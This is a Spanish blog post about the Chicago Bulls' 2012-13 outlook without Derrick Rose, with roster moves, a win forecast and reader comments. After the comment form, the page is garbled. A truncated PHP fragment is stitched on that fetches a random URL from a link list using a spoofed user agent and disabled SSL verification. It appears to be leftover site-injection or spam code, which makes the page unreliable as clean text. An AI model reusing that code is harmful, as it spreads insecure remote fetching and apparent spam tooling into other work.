Chicago Bulls: La vie sans Rose

19 de October de 2012 por TheDeerHunter

No descubrimos la fisión nuclear apuntando que la disponibilidad o no de una estrella de la talla de Derrick Rose condiciona radicalmente las expectativas de cualquier equipo. Con él participando en apenas 39 partidos el curso pasado los Bulls eran favoritos al título. Su lesión en el debut de postemporada supuso el adiós a toda opción.

Se espera que el MVP más joven de la historia pueda volver a la acción en Marzo. Por cómo se ha movido Jerry Reinsdorf este verano podemos hacernos una idea de la fe que se tiene en la franquicia por su producción de este mismo año.

No alcanzamos a saber qué preocupa más en Chicago, si la total recuperación de Rose o el posible impuesto de lujo. La inmensa mayoría de las operaciones han ido en la línea del ahorro radical. Se negaron a igualar a los Rockets por Asik y en su lugar se ha traído a Mohammed por el mínimo; renunciaron al “maltratado” CJ Watson para darle vía libre a Marquis Teague; traspasaron a Korver por dinero y los sustituyeron por Radmanovic; cortaron a Ronnie Brewer para firmar a Marco Bellinelli, también por el mínimo… Sólo han mostrado cierta ambición al firmar al viejo conocido Kirk Hinrich por 8 kilos en 2 años y si queréis también podemos valorar positivamente la llegada de Nate Robinson, que tan buen trabajo ofreció en Oakland, en el puesto de John Lucas. Yo si fuera Carlos Boozer tendría bastante claro en quién van a emplear la amnistía el verano que viene cuando haya que afrontar alguna que otra renovación significativa. Reinsdorf es célebre por su aversión a soltar alegremente la pasta. 

Así, queda una plantilla sutilmente inferior a la del año pasado, aunque con peor perspectiva ante el asunto Rose y sus posibilidades más inmediatas. Es un equipo razonablemente solvente pero sin chispa, precisamente la que aportaría el hombre franquicia. No dudamos que Hinrich sabrá dirigir dignamente a un quinteto bien cohesionado, un año más veterano eso sí, algo que en algún caso podría ser crítico. La segunda unidad en cambio es la que ha salido peor parada y será difícil que se olviden pronto de la aportación de ciertas piezas salientes. No ha habido la más mínima intención de suplirlas con garantías. Sólo de recortar gastos.

Desde ese prisma parece evidente que los Bulls ni se plantean pelear este año. Veo poco sentido en que Rose fuerce lo más mínimo y dudo mucho de que le vayamos a ver el pelo. Boozer va a estar más allá que acá y en estas circunstancias es altamente difícil que Thibodeau logre el nivel de motivación/implicación necesario para implementar sus sistemas defensivos con el éxito habitual. Desde el primero hasta el último son conscientes del carácter “transicional” del curso pensando más en el próximo. La defensa les va a seguir dando victorias en la regular, pero su ataque sin Rose baja muchos enteros. Sólo una reacción inesperada de Boozer y Deng podría hacerles aspirar a algo más. No debería extrañar si quiera que según marche el curso terminen dejándose llevar con vistas a lotería, preparando el terreno al año siguiente con Rose pero sin Boozer.

Altas: Hinrich, Nate Robinson, Belinelli, Marquis Teague, Radmanovic, Mohammed
Bajas: Asik, Korver, Watson, John Lucas

Quinteto: Hinrich, Hamilton, Deng, Boozer, Noah
6º hombre: Taj Gibson

Pronóstico: 35-40 victorias. Peleando la 8ª plaza del Este con posibilidad real de no lograrla.

Comenta

14 comentarios a esta entrada

  1. Ruxixón dice:
    #1

    Poco que añadir,aquí uno más que recomendaría a Rose no volver esta temporada y prepararse a conciencia para el día del retorno no volver a sufrir el martirio por el que ha pasado.Con lo que hay pelear por meterse entre los 8 primeros.

    Taj Gibson he leído que está puntito de renovar lo que significa patada en el culo de Boozer,que dicho sea de paso,una vez amnistiado creo que algún equipo va a quitarle a Chicago muchos millones de su salario.La cuestión es Mirotic si,Mirotic no,¿cómo lo véis?

      Citar

  2. HisRoyalAirness dice:
    #2

    Un título con muchísima clase Deer, trés bien!

      Citar

  3. Sancho88 dice:
    #3

    Mirotic sí, Chicago también en la postemporada, por el entrenador y porque no tienen mal equipo ni mucho menos, y Rose volviendo en marzo para jugar primera ronda y segunda de playoffs. No subestimemos a estos Bulls. Playoffs alcanzan seguro. 40-42 victorias

      Citar

  4. Melo15 dice:
    #4

    Creo que subestimais un poco a Rose, lanunica vez que ha pasado ronda ha sido en mi opinion en una de las temporadas mas debiles de la NBA. Los Celtics estavan fatal despues del traspaso de Perkins, no eran ños de este año, los Magic tampoco eran los de temporadas anteriores y el proyecto ya estava en decadencia, los Knicks, los Pacers y los Sixers estaban recien hechos… Y en Oeste igual. Para mi una de las temporadas con mnos nivel en los ultimos años.
    36-44, sin Rose veo a Toronto y a Milwakee superiores.

      Citar

  5. Heineken dice:
    #5

    Melo15:
    Creo que subestimais un poco a Rose, lanunica vez que ha pasado ronda ha sido en mi opinion en una de las temporadas mas debiles de la NBA. Los Celtics estavan fatal despues del traspaso de Perkins, no eran ños de este año, los Magic tampoco eran los de temporadas anteriores y el proyecto ya estava en decadencia, los Knicks, los Pacers y los Sixers estaban recien hechos… Y en Oeste igual. Para mi una de las temporadas con mnos nivel en los ultimos años.
    36-44, sin Rose veo a Toronto y a Milwakee superiores.

    En ese caso tras la valoración que haces dirás que sobrevaloran a Rose, no que lo subestiman…

    Bueno, yo creo que el Este sigue siendo el Este y que con mitad de victorias aun se podrá entrar en playoffs. Para ello dependen de Boozer y Deng en exceso. Mal asunto…. Pero aun así voy a decir que se clasificaran.

      Citar

  6. HisRoyalAirness dice:
    #6

    En su tercer año en la liga Rose llevó a su equipo a ser líder de la RS y a ser MVP. Sobrevalorado? Lo dudo.
    Y eso con un equipo muy inferior a Celtics o Heat. Al César lo que es del César

      Citar

  7. nba dice:
    #7

    No Rose, no party?, no estoy seguro pero
    no creo que el bueno de Tim, ni Deng ni Noah, permitan que el equipo baje los brazos, deben pelear por entrar en playoff, aunque sea por orgullo, no tiene sentido avergonzar a los aficionados, teniendo en cuenta que parece que tienen interes real en Mirotic., aunque la liga puede dar muchas vueltas, y una lesion, dios no lo quiera, en alguno de los contenders podría facilitar su presencia en playoffs

      Citar

  8. Denise dice:
    #8

    Aun sin Rose, tienen plantilla de sobra para meterse en Playoffs. Tampoco veo que tengan peor plantilla que el año pasado; la baja de CJ Watson se ve compensada con Hinrich y Nate Robinson, que si quiere, es un jugador aceptable. Después se va Korver, pero llega otro tirador mejor que él, como Belinelli y que puede hacer mas cosas que el otro; y por si acaso, tambien tienes a Radmanovic que de vez en cuando muestra algun destello de calidad y puede romper algun partido. Asik podría haber sido importante, pero está claro que no iban a igualar la oferta de Houston. Chicago ya tiene un buen 5 como Noah que te da tus 34 minutitos. y tener a un tío cobrando 8 kilos para jugar un cuarto de hora, me hubiera recordado a la pareja Howard-Gortat (salvando las distancias). Para ese rol de dar 15 minutos intensos, Mohammed es una decente pieza.

    Ah, y estoy seguro de que Rose jugará este año.

    Conclusión: 44-38. 6º y eliminando a los Knicks en Primera Ronda 🙂

      Citar

  9. lost dice:
    #9

    Denise, querrás decir ELIMINADOS por los Knicks en Primera Ronda

      Citar

  10. simon dice:
    #10

    Joder si Rose esta sobrevalorado entonces no se quien no lo está en esta liga… vamos es que hace gracia que digas que Rose esta sobrevalorado y tengas esa profunda admiración por Melo… Rose es un tío que en su primera temporada es ROY y lleva a su equipo a los PO, se marca una serie de escandalo incluso en algun partido creo recordar que estuvo a punto de llegar a los 40 puntos… fuerza el 7º contra unos celtics que solo cayeron ante el magic en 7 partidos. en su segundo año en la liga está todo el año con problemas de lesiones y es all-star y caen en primera ronda ante unos “imparables” Cavs en 5 partidos pero recuerdo esa serie que tuvo por lo menos 3 partidos bastante ajustado que podian haber caido de cualquier lado. En su tercer año es MVP y su equipo el mejor de la temporada y solo el Big Three gran favorito al anillo pudo pararlos… el año pasado iban camino de volver a tener el mejor record de la liga pero se lesionó…. Por no hablar de que en los momentos calientes es de los jugadores con mayor determinación… para nada sobrevalorado…

      Citar

  11. simon dice:
    #11

    He mirado lo de la serie del 2010 contra los Cavs y efectivamente fue 4-1 pero en 3 partidos estuvieron luchando hasta el final. Y la serie de lebron es probablemente de las mejores que se recuerdan, al menos estadisticamente hablando…32 puntos. 9.5 rebotes 10 asistencias… casi casi un triple doble… brutal

      Citar

  12. Esteban dice:
    #12

    que jugadores se extrañaran tanto desde la banca, brewer, lucas, watson, asik?

    tanto menos son, robinson, bellineli, teague, radmanovic, mohamed? y cuando vuelva rose, hirkich pasara a la segunda unidad

    la unica perdida dolorosa es la de asik, que igualmente es mas futuro que presente

      Citar

  13. lost dice:
    #13

    Para mí se van a notar los que se han ido. Asik era importante y además Gibson en esta preseason no está haciendo nada, ni se entera. Robinson es mejor que Watson para mí, aunque no es una gran mejora tampoco. Teague es seguramente la mejor adquisición, pero de momento se le ve muy verde para jugar en la NBA, jugador de futuro, no da la talla de momento. Pero para mí la pérdida más importante es Brewer. Lo encuentro uno de los mejores defensores de perímetro de la liga, no es un gran tirador pero las puede enchufar, para mí es una pérdida importantísima para los Bulls, más de lo que parece.
    En cambio, aunque Mohamed no es Asik, de momento está demostrando que es un jugador válido, que cumple su papel y por el mínimo.
    Como dice Deer en el análisis, depender de Deng y Boozer en exceso es malo no, malísimo. A no ser que Bellinelli de un paso adelante, veo a unos Bulls bastante mal en lo ofensivo, pero siempre les quedará la defensa.

    PD: Lo de Rose sobrevalorado, pues… para mí es un grandísimo jugador, uno de los mejores bases en la actualidad cuando está al 100%, incluso al 90%, pero creo que no se merecía el MVP de la RS que ganó.

      Citar

  14. Sempren dice:
    #14

    Esteban y lost, os olvidáis de Korver, que si bien es el jugador que es, hizo un último año muy bueno, totalmente adaptado a lo que querían de él.

    Lástima que al final a Hamilton le saliera tan mal la jugada

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>